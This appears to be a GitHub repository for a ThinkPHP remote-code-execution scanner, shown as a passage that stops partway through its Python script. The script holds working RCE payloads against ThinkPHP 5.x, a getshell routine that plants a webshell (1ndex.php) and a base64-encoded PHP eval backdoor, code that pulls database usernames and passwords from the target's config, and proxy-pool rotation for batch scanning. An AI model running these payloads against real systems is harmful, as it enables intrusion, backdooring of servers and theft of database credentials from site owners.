├── .gitignore ├── LICENSE ├── README.md └── thinkphp_rce.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ThinkphpRCE 2 | Thinkphp rce扫描脚本,附带日志扫描 3 | 4 | - 2020.06.18 更新 5 | 1. 增加使用代理池功能 6 | 2. 增加输出到文件功能 7 | 3. 去掉了一些使用syetem函数的payload和重复payload(导致IP容易被封,且必要性不是很大) 8 | 4. 优化了一些代码,多个网站的时候显示进度 9 | 10 | - 使用方法(python3.x) 11 | ``` 12 | usage: thinkphp_rce.py [-h] [-u URL] [-f FILE] [-p PROXY] [--shell] 13 | 14 | Thinkphp Scan 15 | 16 | optional arguments: 17 | -h, --help show this help message and exit 18 | -u URL, --url URL Start scanning url -u xxx.com 19 | -f FILE, --file FILE read the url from the file 20 | -p PROXY, --proxy PROXY 21 | use HTTP/HTTPS proxy 22 | --shell try to get shell 23 | ``` 24 | ``` 25 | python3 thinkphp_rce.py -u http://192.168.76.248/thinkphp520/public/ 26 | 27 | python3 thinkphp_rce.py -h host.txt 28 | 29 | python3 thinkphp_rce.py -u http://192.168.76.248/thinkphp520/public/ --shell //批量检测和getshell 30 | 31 | python3 thinkphp_rce.py -u http://192.168.76.248/thinkphp520/public/ --proxy proxy.txt //使用代理池(http/https) 32 | ``` 33 | - proxy.txt 34 | ``` 35 | 127.0.0.1:8080 36 | 114.107.150.215:46213 37 | ``` -------------------------------------------------------------------------------- /thinkphp_rce.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | 3 | import requests 4 | from urllib import parse 5 | import urllib3 6 | import base64 7 | import argparse 8 | import time 9 | import random 10 | import sys 11 | from bs4 import BeautifulSoup 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | # requests.packages.urllib3.disable_warnings() 15 | 16 | headers = { 17 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0', 18 | 'Accept': 'application/json, text/plain, */*', 19 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 20 | 'Accept-Encoding': 'gzip, deflate', 21 | 'Content-Type': 'application/x-www-form-urlencoded', 22 | 'Connection': 'close'} 23 | 24 | def proxy_get(host, proxy): 25 | if proxy: 26 | proxies = random.choice(proxy) 27 | proxies_use = {"http": "http://{}".format(proxies.strip('\n')), "https": "https://{}".format(proxies.strip('\n'))} 28 | try: 29 | res = requests.get(url=host, headers=headers, verify=False, proxies=proxies_use, timeout=5) 30 | res.encoding = 'utf-8' 31 | if res.status_code == 500 and 'ThinkPHP' in res.text: 32 | sta_code = 200 33 | else: 34 | sta_code = res.status_code 35 | except: 36 | sta_code = 100 37 | while sta_code != 200: 38 | proxy.remove(proxies) 39 | if proxy: 40 | proxies = random.choice(proxy) 41 | proxies_use = {"http": "http://{}".format(proxies.strip('\n')), "https": "https://{}".format(proxies.strip('\n'))} 42 | try: 43 | res = requests.get(url=host, headers=headers, verify=False, allow_redirects=False, proxies=proxies_use, timeout=5) 44 | sta_code = res.status_code 45 | except: 46 | pass 47 | else: 48 | print('没有代理可用了') 49 | sys.exit(0) 50 | else: 51 | proxy = False 52 | proxies_use = [] 53 | return proxies_use, proxy 54 | 55 | def req_get(url, proxy): 56 | res_body = '' 57 | if proxy: 58 | try: 59 | res = requests.get(url=url, headers=headers, verify=False, allow_redirects=False, proxies=proxy, timeout=5) 60 | res.encoding = 'utf-8' 61 | # res_body = res.text 62 | except: 63 | print("\033[1;31m网络出错!\033[0m") 64 | pass 65 | else: 66 | try: 67 | res = requests.get(url=url, headers=headers, verify=False, allow_redirects=False, timeout=5) 68 | res.encoding = 'utf-8' 69 | # res_body = res.text 70 | except: 71 | print("\033[1;31m网络出错!\033[0m") 72 | pass 73 | return res 74 | 75 | def req_post(url, proxy, data): 76 | res_body = '' 77 | if proxy: 78 | try: 79 | res = requests.post(url=url, headers=headers, verify=False, data=data, allow_redirects=False, proxies=proxy, timeout=5) 80 | res.encoding = 'utf-8' 81 | except: 82 | print("\033[1;31m网络出错!\033[0m") 83 | pass 84 | else: 85 | try: 86 | res = requests.post(url=url, headers=headers, verify=False, data=data, allow_redirects=False, timeout=5) 87 | res.encoding = 'utf-8' 88 | except: 89 | print("\033[1;31m网络出错!\033[0m") 90 | pass 91 | return res 92 | 93 | def think_rce_check(host, proxy): 94 | print('\033[1;34m[!] thinkphp_RCE探测:\033[0m') 95 | # 5.0.x命令执行,<=5.0.24 96 | success = [] 97 | headers["Host"] = parse.urlparse(host).hostname 98 | payloads = [r"/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1", 99 | r"/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", 100 | r"/?s=index/think\request/input?data[]=phpinfo()&filter=assert", 101 | r"/?s=index/\think\view\driver\Php/display&content=", 102 | r"/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", 103 | r"/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1", 104 | r"/?s=index/\think\Request/input&filter[]=phpinfo&data=-1", 105 | r"/?s=index/\think\module/action/param1/${@phpinfo()}"] 106 | for i in payloads: 107 | url1 = host + i 108 | proxies, proxy = proxy_get(host, proxy) 109 | res_body_1 = req_get(url1, proxies) 110 | if ('PHP Version' in res_body_1.text) or ('PHP Extension Build' in res_body_1.text): 111 | success.append(url1) 112 | else: 113 | pass 114 | 115 | # ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha 116 | url2 = host + "/?s=captcha&test=-1" 117 | post_2 = [r'_method=__construct&filter=phpinfo&method=get&server[REQUEST_METHOD]=1', 118 | r'_method=__construct&filter[]=phpinfo&method=GET&get[]=1'] 119 | query_2 = '/?s=captcha&test=-1' 120 | for j in post_2: 121 | proxies, proxy = proxy_get(host, proxy) 122 | res_body_2 = req_post(url2, proxies, j) 123 | if ('PHP Version' in res_body_2.text) or ('PHP Extension Build' in res_body_2.text): 124 | payload_post2 = url2 + " POST: " + j 125 | success.append(payload_post2) 126 | else: 127 | pass 128 | 129 | url3 = host + "/?s=captcha&test=phpinfo()" 130 | post_3 = r'_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=-1' 131 | proxies, proxy = proxy_get(host, proxy) 132 | res_body_3 = req_post(url3, proxies, post_3) 133 | if ('PHP Version' in res_body_3.text) or ('PHP Extension Build' in res_body_3.text): 134 | payload_post3 = url3 + " POST: " + post_3 135 | success.append(payload_post3) 136 | else: 137 | pass 138 | 139 | # ThinkPHP <= 5.0.13 140 | url4 = host + "/?s=index/index/" 141 | post_4 = [r's=-1&_method=__construct&method=get&filter[]=phpinfo', 142 | r'_method=__construct&method=get&filter[]=phpinfo&get[]=-1'] 143 | for k in post_4: 144 | proxies, proxy = proxy_get(host, proxy) 145 | res_body_4 = req_post(url4, proxies, k) 146 | if ('PHP Version' in res_body_4.text) or ('PHP Extension Build' in res_body_4.text): 147 | payload_post4 = url4 + " POST: " + k 148 | success.append(payload_post4) 149 | else: 150 | pass 151 | 152 | # ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug 153 | url5 = host 154 | post_5 = [r'_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=-1'] 155 | for h in post_5: 156 | proxies, proxy = proxy_get(host, proxy) 157 | res_body_5 = req_post(url5, proxies, h) 158 | if ('PHP Version' in res_body_5.text) or ('PHP Extension Build' in res_body_5.text): 159 | payload_post5 = url5 + " POST: " + h 160 | success.append(payload_post5) 161 | else: 162 | pass 163 | 164 | if success: 165 | print("\033[1;34m[!] 存在thinkphp_RCE! 可用Payload:\033[0m") 166 | for p in success: 167 | print("\033[1;32m{}\033[0m".format(p)) 168 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 169 | fo.write(p + '\n') 170 | fo.close() 171 | else: 172 | print("\033[1;31m[!] 不存在thinkphp_RCE!\033[0m") 173 | 174 | 175 | def getshell(host,proxy): 176 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 177 | print("\033[1;34m[!]正在尝试Getshell:\033[0m") 178 | headers["Host"] = parse.urlparse(host).hostname 179 | success = False 180 | shell = "" 181 | shell_url = host + "/1ndex.php" 182 | payload = [ 183 | r"/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=1ndex.php&vars[1][]=" + shell, 184 | r"/?s=index/\think\template\driver\file/write&cacheFile=1ndex.php&content=" + shell, 185 | ] 186 | for k in payload: 187 | url = host + k 188 | proxies, proxy = proxy_get(host, proxy) 189 | req_get(url, proxies) 190 | getshell_res = req_get(shell_url, proxies) 191 | if getshell_res.status_code == 200: 192 | print("\033[1;32m[+] Getshell succeed,shell address: " + host + "/1ndex.php\n\033[0m") 193 | fo.write('Getshell succeed,shell address: {}/1ndex.php'.format(host)) 194 | success = True 195 | break 196 | else: 197 | pass 198 | 199 | if not success: 200 | # ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha 201 | post_payload2 = r'_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=-1' 202 | # try: 203 | proxies, proxy = proxy_get(host, proxy) 204 | url2 = host + '/?s=captcha&test=echo+\'"{}"\'+>>1ndex.php'.format(shell) 205 | req_post(url2, proxies, post_payload2) 206 | getshell_res2 = req_get(shell_url, proxies) 207 | if getshell_res2.status_code == 200: 208 | print("\033[1;32m[+] Getshell succeed,shell address: " + host + "/1ndex.php\n\033[0m") 209 | fo.write('Getshell succeed,shell address: {}/1ndex.php\n'.format(host)) 210 | success = True 211 | else: 212 | pass 213 | 214 | if not success: 215 | # ThinkPHP <= 5.0.13 216 | post_payload3 = [r's=echo+ "{}" +>>1ndex.php&_method=__construct&method=&filter[]=system'.format(shell), 217 | r'_method=__construct&filter[]=system&mytest=echo+ "{}" +>>1ndex.php'.format(shell)] 218 | for h in post_payload3: 219 | # try: 220 | proxies, proxy = proxy_get(host, proxy) 221 | url3 = host + "/?s=index/index" 222 | req_post(url3,proxies, h) 223 | getshell_res3 = req_get(shell_url, proxies) 224 | if getshell_res3.status_code == 200: 225 | print("\033[1;32m[+] Getshell succeed,shell address: " + host + "/1ndex.php\n\033[0m") 226 | fo.write('Getshell succeed,shell address: {}/1ndex.php\n'.format(host)) 227 | success = True 228 | break 229 | else: 230 | pass 231 | 232 | if not success: 233 | # 参考链接:https://www.cnblogs.com/r00tuser/p/11410157.html 234 | sess = "hahahatest" 235 | headers.update({"Cookie": "PHPSESSID={}".format(sess)}) 236 | sess_dir = 'php://filter/read=convert.base64-decode/resource=/tmp/sess_{}'.format(sess).encode(encoding="utf-8") 237 | base64_ = base64.b64encode(sess_dir).decode() 238 | post_payload4 = r'_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1' 239 | post_res = r'_method=__construct&filter[]=base64_decode&filter[]=think\__include_file&method=get&server[]=1&get[]={}'.format( 240 | base64_) 241 | proxies, proxy = proxy_get(host, proxy) 242 | url4 = host + "/?s=captcha&test=1" 243 | req_post(url4, proxies,post_payload4) 244 | shell_add_4 = host + "/?s=captcha&r=cGhwaW5mbygpOw==" 245 | getshell_res4 = req_post(shell_add_4, proxies,post_res) 246 | if ('PHP Version' in getshell_res4.text) or ('PHP Extension Build' in getshell_res4.text): 247 | print( 248 | "\033[1;32m[+] Getshell success, You can use POST " + host + "/?s=captcha&r=cGhwaW5mbygpOw==\n\033[0m" + "\033[1;32m[=] _method=__construct&filter[]=base64_decode&filter[]=think\__include_file&method=get&server[]=1&get[]={}\033[0m".format( 249 | base64_)) 250 | print("\033[1;32m[+] r 参数是命令的base64编码\n\033[0m") 251 | fo.write('Getshell succeed,shell address: {}/?s=captcha&r=cGhwaW5mbygpOw==\n'.format(host)) 252 | fo.write('r 参数是命令的base64编码\n') 253 | success = True 254 | else: 255 | pass 256 | 257 | 258 | if not success: 259 | post_payload5 = r'_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]={}'.format( 260 | shell) 261 | time_dir = time.strftime("%Y%m/%d", time.localtime()) 262 | try: 263 | proxies, proxy = proxy_get(host, proxy) 264 | url5 = host + "/?s=captcha" 265 | req_post(url5,proxies,post_payload5) 266 | dir_ = "/../../runtime/log/{}.log".format(time_dir) 267 | shell_url_5 = host + "/?s=index/\\think\Lang/load&file=" + dir_ 268 | getshell_res5 = req_get(shell_url_5, proxies) 269 | if ("098f6bcd4621d373cade4e832627b4f6" in getshell_res5.text): 270 | print('\033[1;32m[+] Getshell success: ' + shell_url_5 + "\n\033[0m") 271 | fo.write('Getshell success: {}\n'.format(shell_url_5)) 272 | success = True 273 | else: 274 | pass 275 | except: 276 | pass 277 | if not success: 278 | print("\033[1;31m[!]Getshell失败!\033[0m") 279 | fo.close() 280 | return success 281 | 282 | 283 | def get_mysql_conf(host): 284 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 285 | headers["Host"] = parse.urlparse(host).hostname 286 | print("\033[1;34m[!] 尝试获取数据库配置:\033[0m") 287 | mysql_success = False 288 | try: 289 | name = requests.get(url=host + "/?s=index/think\config/get&name=database.username", headers=headers, timeout=5, 290 | verify=False, allow_redirects=False) 291 | hostname = requests.get(url=host + "/?s=index/think\config/get&name=database.hostname", headers=headers, 292 | timeout=5, 293 | verify=False, allow_redirects=False) 294 | password = requests.get(url=host + "/?s=index/think\config/get&name=database.password", headers=headers, 295 | timeout=5, 296 | verify=False, allow_redirects=False) 297 | database = requests.get(url=host + "/?s=index/think\config/get&name=database.database", headers=headers, 298 | timeout=5, 299 | verify=False, allow_redirects=False) 300 | if len(name.text) >0 and len(name.text)< 100: 301 | fo.write('database username: {}\n'.format(name.text)) 302 | print("\033[1;32m[+] database username: \033[0m" + name.text) 303 | mysql_success = True 304 | if len(hostname.text) >0 and len(hostname.text)< 100: 305 | fo.write('database hostname: {}\n'.format(hostname.text)) 306 | print("\033[1;32m[+] database hostname: \033[0m" + hostname.text) 307 | if len(password.text) >0 and len(password.text)< 100: 308 | fo.write('database password: {}\n'.format(password.text)) 309 | print("\033[1;32m[+] database password: \033[0m" + password.text) 310 | if len(database.text) >0 and len(database.text)< 100: 311 | fo.write('database name: {}\n'.format(database.text)) 312 | print("\033[1;32m[+] database name: \033[0m" + database.text) 313 | if not mysql_success: 314 | print("\033[1;31m[!] 数据库配置获取失败\033[0m") 315 | except: 316 | pass 317 | fo.close() 318 | 319 | def log_find(host): 320 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 321 | headers["Host"] = parse.urlparse(host).hostname 322 | print('\033[1;34m[!] 日志文件路径探测:\033[0m') 323 | time_dir_5 = time.strftime("%Y%m/%d", time.localtime()) 324 | # thinkphp 5 主日志 info 325 | log_dir_info_5 = host + "/../../runtime/log/{}.log".format(time_dir_5) 326 | # 错误日志 error 327 | log_dir_error_5 = host + "/../../runtime/log/{}_error.log".format(time_dir_5) 328 | # sql日志 sql 329 | log_dir_sql_5 = host + "/../../runtime/log/{}_sql.log".format(time_dir_5) 330 | try: 331 | info_res = requests.get(url=log_dir_info_5, headers=headers, timeout=5, verify=False, allow_redirects=False) 332 | error_res = requests.get(url=log_dir_error_5, headers=headers, timeout=5, verify=False, allow_redirects=False) 333 | sql_res = requests.get(url=log_dir_sql_5, headers=headers, timeout=5, verify=False, allow_redirects=False) 334 | if info_res.status_code == 200 and ( 335 | ("[ info ]" in info_res.text) or ("[ sql ]" in info_res.text) or ("[ error ]" in info_res.text)): 336 | fo.write('info日志存在: {}\n'.format(log_dir_info_5)) 337 | print("\033[1;32m[+] info日志存在: \033[0m" + log_dir_info_5) 338 | if error_res.status_code == 200 and ( 339 | ("[ info ]" in error_res.text) or ("[ sql ]" in error_res.text) or ("[ error ]" in error_res.text)): 340 | fo.write('error日志存在: {}\n'.format(log_dir_error_5)) 341 | print("\033[1;32m[+] error日志存在: \033[0m" + log_dir_error_5) 342 | if sql_res.status_code == 200 and ( 343 | ("[ info ]" in sql_res.text) or ("[ sql ]" in sql_res.text) or ("[ error ]" in sql_res.text)): 344 | fo.write('sql日志存在: {}\n'.format(log_dir_sql_5)) 345 | print("\033[1;32m[+] sql日志存在: \033[0m" + log_dir_sql_5) 346 | except: 347 | print("\033[1;31m网络出错!\033[0m") 348 | 349 | # thinkphp 3 日志 350 | time_dir_3 = time.strftime("%y_%m_%d", time.localtime()) 351 | log_dir_3_1 = host + "/Application/Runtime/Logs/Home/{}.log".format(time_dir_3) 352 | log_dir_3_2 = host + "/Runtime/Logs/Home/{}.log".format(time_dir_3) 353 | log_dir_3_3 = host + "/Runtime/Logs/Common/{}.log".format(time_dir_3) 354 | log_dir_3_4 = host + "/Application/Runtime/Logs/Common/{}.log".format(time_dir_3) 355 | log_dir_3_5 = host + "/App/Runtime/Logs/Home/{}.log".format(time_dir_3) 356 | log_dir_3 = [log_dir_3_1, log_dir_3_2, log_dir_3_3, log_dir_3_4, log_dir_3_5] 357 | for i in log_dir_3: 358 | try: 359 | log_3_res = requests.get(url=i, headers=headers, timeout=5, verify=False, allow_redirects=False) 360 | log_3_res.encoding = 'utf-8' 361 | if log_3_res.status_code == 200 and (("INFO:" in log_3_res.text) or ("SQL语句" in log_3_res.text) or ("ERR:" in log_3_res.text)): 362 | fo.write('日志存在: {}\n'.format(i)) 363 | print("\033[1;32m[+] 日志存在: \033[0m" + i) 364 | else: 365 | pass 366 | except: 367 | print("\033[1;31m网络出错!\033[0m") 368 | fo.close() 369 | 370 | def check_dubug(host): 371 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 372 | headers["Host"] = parse.urlparse(host).hostname 373 | div_html_5 = '' 374 | div_html_3 = '' 375 | print("\033[1;34m[+] 检测Debug模式是否开启: \033[0m") 376 | debug_bool = False 377 | url_debug = ["indx.php", "/index.php/?s=index/inex/"] 378 | for i in url_debug: 379 | try: 380 | res_debug = requests.get(url=host + i, headers=headers, timeout=5, verify=False, allow_redirects=False) 381 | res_debug.encoding = 'utf-8' 382 | if ("Environment Variables" in res_debug.text) or ("错误位置" in res_debug.text): 383 | print("\033[1;32m[+] Debug 模式已开启!\033[0m") 384 | debug_bool = True 385 | res_debug_html = BeautifulSoup(res_debug.text, 'html.parser') 386 | div_html_5 = res_debug_html.findAll('div', {'class': 'clearfix'}) 387 | div_html_3 = res_debug_html.find('sup') 388 | div_html_3_path = res_debug_html('div', {'class': 'text'}) 389 | break 390 | except: 391 | print("\033[1;31m[+] 检测出错\033[0m") 392 | if debug_bool == False: 393 | print("\033[1;31m[+] Debug 模式未开启!\033[0m") 394 | if debug_bool: 395 | if div_html_5: 396 | for j in div_html_5: 397 | if j.strong.text == 'THINK_VERSION': 398 | fo.write('ThinkPHP Version: {}\n'.format(j.small.text.strip())) 399 | print("\033[1;32m[+] ThinkPHP Version: {}\033[0m".format(j.small.text.strip())) 400 | if j.strong.text == 